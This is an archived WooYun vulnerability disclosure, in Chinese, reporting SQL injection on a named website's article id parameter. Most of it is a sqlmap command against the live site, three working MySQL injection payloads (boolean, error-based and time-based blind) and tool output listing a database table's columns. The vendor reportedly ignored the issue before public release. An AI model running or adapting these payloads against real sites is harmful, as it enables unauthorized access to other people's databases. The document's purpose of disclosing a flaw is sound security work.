乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-20: 细节已通知厂商并且等待厂商处理中 2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开
RT
sql注射:sqlmap.py -u "http://lidroid.com/article?id=107"
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=107 AND 4916=4916 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=107 AND (SELECT 7211 FROM(SELECT COUNT(*),CONCAT(0x7170707871,(SELECT (ELT(7211=7211,1))),0x716a626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=107 AND (SELECT * FROM (SELECT(SLEEP(5)))RrAK)---[18:21:15] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.44, Nginxback-end DBMS: MySQL 5.0[18:21:15] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns[18:21:15] [INFO] fetching current database[18:21:15] [INFO] resumed: www[18:21:15] [INFO] fetching columns for table 'rom_info' in database 'www'[18:21:15] [WARNING] reflective value(s) found and filtering out[18:21:15] [INFO] the SQL query used returns 14 entries[18:21:17] [INFO] retrieved: id[18:21:17] [INFO] retrieved: int(11)[18:21:17] [INFO] retrieved: device_id[18:21:18] [INFO] retrieved: int(11)[18:21:18] [INFO] retrieved: ui_type_id[18:21:18] [INFO] retrieved: int(11)[18:21:18] [INFO] retrieved: user_id[18:21:18] [INFO] retrieved: int(11)[18:21:18] [INFO] retrieved: title[18:21:18] [INFO] retrieved: varchar(256)[18:21:18] [INFO] retrieved: android_version[18:21:18] [INFO] retrieved: varchar(256)[18:21:19] [INFO] retrieved: version[18:21:19] [INFO] retrieved: varchar(256)[18:21:19] [INFO] retrieved: md5[18:21:19] [INFO] retrieved: varchar(256)[18:21:19] [INFO] retrieved: size[18:21:20] [INFO] retrieved: int(11)[18:21:23] [INFO] retrieved: introduction[18:21:23] [INFO] retrieved: text[18:21:23] [INFO] retrieved: tips[18:21:23] [INFO] retrieved: text[18:21:23] [INFO] retrieved: update_time[18:21:24] [INFO] retrieved: datetime[18:21:24] [INFO] retrieved: download_times[18:21:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[18:21:46] [INFO] retrieved: int(11)[18:21:46] [INFO] retrieved: show_order[18:21:47] [INFO] retrieved: int(11)Database: wwwTable: rom_info[14 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| size | int(11) || version | varchar(256) || android_version | varchar(256) || device_id | int(11) || download_times | int(11) || id | int(11) || introduction | text || md5 | varchar(256) || show_order | int(11) || tips | text || title | varchar(256) || ui_type_id | int(11) || update_time | datetime || user_id | int(11) |+-----------------+--------------+
我是来找礼物的!
危害等级:无影响厂商忽略
忽略时间:2015-10-25 18:48
漏洞Rank:4 (WooYun评价)
暂无